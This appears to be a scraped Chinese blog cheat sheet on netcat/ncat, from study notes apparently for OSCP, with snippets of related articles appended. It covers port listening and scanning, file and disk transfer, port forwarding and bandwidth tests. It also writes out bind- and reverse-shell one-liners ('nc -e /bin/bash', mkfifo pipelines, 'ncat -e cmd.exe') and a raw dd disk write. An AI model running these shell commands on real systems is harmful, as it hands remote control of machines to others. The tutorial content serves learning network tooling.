ncat使用总结

功能

1. 监听本地端口
2. 连接目标端口
3. 传送文件
4. Remote Administration with Netcat(OSCP中给的分类,不知道此分类的作用,需要深入学习)
5. 反弹shell
6. 测两台机器间的网速

监听本地端口

# 临时监听端口
nc -l <PORT> # 临时监听TCP端口一次
nc -lu <PORT> # 临时监听UDP端口

# 以监听TCP端口为例,监听UDP端口基本一样

服务器端临时 监听端口

客户端尝试连接服务器端

建立TCP连接

客户端断开连接时,服务器端也关闭端口的监听

nc -lk <PORT> #永久监听TCP端口
nc -lku <PORT> #永久监听UDP端口
# 永久监听:监听端口,并且客户端端来连接时,服务器端依旧监听等待连接;并且支持多客户端同时连接。UDP端口类似。

连接目标端口

# 在监听部分可以找到连接的图,接下来重点操作一下端口扫描;nc扫描端口会创建TCP三次握手连接,会造成一定的流量,容易被发现。
nc <IP> <PORT>  # 连接目标TCP端口
nc -u <IP> <PORT> # 连接目标UDP端口
# 使用上述命令连接tcp或UDP端口,连接成功后会阻塞在用户输入中,让用户与目标端口进行交互。此外还有一种非交互模式,适合用来扫描端口。
nc -z <IP> <PORT> #扫描目标TCP端口
nc -zu <IP> <PORT> # 扫描目标UDP端口
#  -w参数的适用场景:扫描UDP端口;网络状况不好。在网络状况良好是,扫描TCP端口没有必要使用此参数。
nc -z -w1 <IP> <PORT> range

传送文件

此部分需要两台机器的配合

A机:数据存储机器
B机:备份机器

TCP传送文件

B: nc -l <PORT> > filename
A: nc <IP> <PORT> < filename

文件传送完成后,连接自动断开

UDP传送文件

#B
nc -lu <PORT> > filename

#A
nc -u <IP> <PORT> < filename

# 文件传输完成后,连接不会断开,可反复连接B机进行文件传输。

# UDP更适合做一个日志接受端,其他的机器都把通过nc把日志写入到监听的UDP机器上


传送目录

# 传送目录与传送文件是一样的,只是通过tar将目录打包为压缩文件传过去并自定tar解包,实现传送目录的功能
#B
nc -l <PORT> | tar zxvf -

#A
tar zcf - * | nc <IP> <PORT>

传送分区

B: nc -l <PORT> | dd of=/dev/sda
A: dd if=/dev/sda | nc <IP> <PORT>

反弹shell

# nc有-e选项时

#server
nc -l <PORT> -e /bin/bash -i

#client
nc <IP> <PORT>
# nc没有-e选项时,创建正向shell

#server
mkfifo /tmp/fifo && cat /tmp/fifo | /bin/bash -i 2>&1 | nc -l <PORT> > /tmp/fifo

#client
nc <IP> <PORT>
# 创建反向shell(服务器端连接客户端,然后受客户端控制)
#client:
nc <IP> <PORT>

#server:
mkfifo /tmp/fifo && cat /tmp/fifo | /bin/bash -i 2>&1 | nc <IP> <PORT> > /tmp/fifo && rm -rf /tmp/fifo

端口转发

# server
nc -l <target port>
mkfifo /tmp/fifo && cat /tmp/fifo | nc localhost <target port> | nc -l <listen port> > /tmp/fifo

# client
nc -n <IP> <listen port>

测机器间网速

A: nc -l <PORT> >/dev/null
B: nc <IP> <PORT> < /dev/zero

A、B:watch -n 1 "/sbin/ifconfig <interface> | grep bytes"

参考文章

原文地址:http://blog.51cto.com/executer/2074434

时间: 2024-10-12 17:27:03

ncat使用总结的相关文章

ncat的使用

由于netcat的缺陷,所以有了升级版ncat,弥补了netcat的一些不足. ncat是nmap工具包的一个工具. 服务器端 ncat -c bash --allow 192.168.1.119 -vnl 333 --ssl --allow 192.168.1.119只允许192.168.1.119这个IP进行连接. -vnl 开放的端口是333 .--ssl 启用ssl加密. 客户端 ncat -nv 192.168.1.115 333 --ssl

Ncat 反弹 Shell

ncat -l -n -v -p 9999 ncat -e /bin/sh 127.0.0.1 9999 ncat -e C:\Windows\system32\cmd.exe 127.0.0.1 9999 原文地址:https://www.cnblogs.com/forsaken/p/8582793.html

ncat

ncat 或者说 nc 是一款功能类似 cat 的工具,但是是用于网络的.它是一款拥有多种功能的 CLI 工具,可以用来在网络上读.写以及重定向数据. 它被设计成可以被脚本或其他程序调用的可靠的后端工具.同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具. ncat/nc 既是一个端口扫描工具,也是一款安全工具,还能是一款监测工具,甚至可以做为一个简单的 TCP 代理. 由于有这么多的功能,它被誉为是网络界的瑞士军刀. 这是每个系统管理员都应该知道并且掌握它. 在大多数 Debian

一文让你熟练掌握Linux的ncat(nc)命令

一文让你熟练掌握Linux的ncat(nc)命令 ncat 或者说 nc 是一款功能类似 cat 的工具,但是是用于网络的.它是一款拥有多种功能的 CLI 工具,可以用来在网络上读.写以及重定向数据. 它被设计成可以被脚本或其他程序调用的可靠的后端工具.同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具. ncat/nc 既是一个端口扫描工具,也是一款安全工具,还是一款监测工具,甚至可以做为一个简单的 TCP 代理. 由于有这么多的功能,它被誉为是网络界的瑞士军刀. 这是每个系统管理

7-zip的标准输入输出(STDIN,STDOUT)与Ncat的配合使用,压缩后传输文件

Netcat/Ncat是很好用的网络工具,使用方法网上已经有很多文章讲解了,不再赘述.本文讲述用7-zip配合Ncat,实现从A机器到B机器的文件压缩传输.也就是说,准备发送的文件先在A机器上压缩,再把压缩之后的数据传送到B机器,在B机器实时解压缩,整个的传输过程对用户来说是透明的.因为流量减小了,网传速度可能得以加快.之所以说"可能",是因为压缩后传输速度是否得以加快,取决于CPU速度与网络速度之比.如果CPU慢而网速快,那还不如不压缩.如果出现这种情况,就当本文是一片纯技术探讨文把

shell 命名管道,进程间通信, ncat作http server

命名管道基础 命名管道也被称为FIFO文件, 在文件系统中是可见的,并且跟其它文件一样可以读写! 命名管道特点: 当写进程向管道中写数据的时候,如果没有进程读取这些数据,写进程会堵塞 当读取管道中的数据的时候,如果没有数据,读取进程会被堵塞 当写进程堵塞的时候,有读进程读取数据,那么写进程恢复正常 当读进程堵塞的时候,如果写进程写了数据,那么读进程会读取数据,然后正常执行后面的代码 # 写进程堵塞的情况 [[email protected]_10.2.1.242 test]$ echo 1 >p

linux ncat命令

netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据.通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它.使用netcat命令所能完成的事情令人惊讶. netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了.你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端. 下面是一些使用netcat的例子. [A(172.31.100.7) B(172.31.100.23)] Linux netcat

Linux下常用的系统性能查看分析工具

Linux中,很多很全面显示系统当前运行状态,负载,I/O等信息的工具,帮助管理员实时了解系统运行动态,以及排除故障. ps命令:显示进程状态,快照方式显示. 进程分为两类:一类是用户通过终端启动的进程,一类是与终端无关的进程,多为守护进程. ps命令支持两种风格的命令:SysV风格 BDS风格.带横线的是SysV风格. ps命令选项:     a  :与终端有关的进程     x  : 与终端无关的进程     u  : 显示是哪个用户启动的       -e : 显示所有进程     -f 

网络安全扫描--基础篇

前言 1.了解互联网安全领域中日趋重要的扫描技术 2.了解在不同网络场景下扫描技术手段 3.熟悉linux下系统内核防护策略并能大件一个有效的系统防护体系 4.增强工作安全意识,并能有效的实践于工作场景中 目录 1.熟悉主机扫描工具(fping,hping)安装和使用 2.熟悉路由扫描工具(traceroute,mtr)使用 3.熟悉批量服务扫描工具(nmap,ncat)使用 4.熟悉如何通过linux内核预防恶意的扫描或者syn攻击 主机扫描 fping工具 作用: 批量的给目标发送ping要